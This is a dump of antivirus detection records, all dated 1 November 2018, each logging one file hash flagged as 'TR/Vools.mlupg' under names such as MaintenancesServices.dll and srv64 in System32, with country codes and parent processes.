  Row(detection=Row(filename='avscan-20181101-130128-c3753bc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6a30824\\AVSCAN-20181101-130119-C1DB8ED3\\AVSCAN-20181101-130128-C3753BC0', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:01:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:39:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:57:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-120311-81fc4c37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ce46a6d7\\AVSCAN-20181101-120252-7F980F3E\\AVSCAN-20181101-120311-81FC4C37', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:00:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:18:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='\\?\\C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:29:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:29:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T06:07:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:38:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:28:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:02:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:39:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T14:08:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:39:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T08:15:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:24:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T06:50:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091911-f4c8d5ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-091843-EFD64E6A\\AVSCAN-20181101-091911-F4C8D5AB', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:20:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T05:38:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:29:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091908-f44b2009', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-091843-EFD64E6A\\AVSCAN-20181101-091908-F44B2009', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:20:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:10:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:51:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:25:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:55:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:02:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:19:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095050-8e040ab4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0714c40\\AVSCAN-20181101-095038-8BB12B2D\\AVSCAN-20181101-095050-8E040AB4', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:51:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:47:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:20:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:57:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.vir', filepath='C:\\Windows\\System32\\MaintenancesServices.VIR', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T07:08:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095050-8e040ab4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0714c40\\AVSCAN-20181101-095038-8BB12B2D\\AVSCAN-20181101-095050-8E040AB4', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:51:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:59:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T05:03:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:05:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:52:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:16:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:24:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T06:51:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:12:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200222-ce1eec28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c5ba033c\\AVSCAN-20181101-200201-CA0A4266\\AVSCAN-20181101-200222-CE1EEC28', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:02:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:55:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:48:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:17:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T04:59:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:50:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:21:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:13:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:07:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:20:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:28:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:10:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:00:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:10:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:40:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:43:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:27:58Z'), dt=datetime.date(2018, 11, 1)),
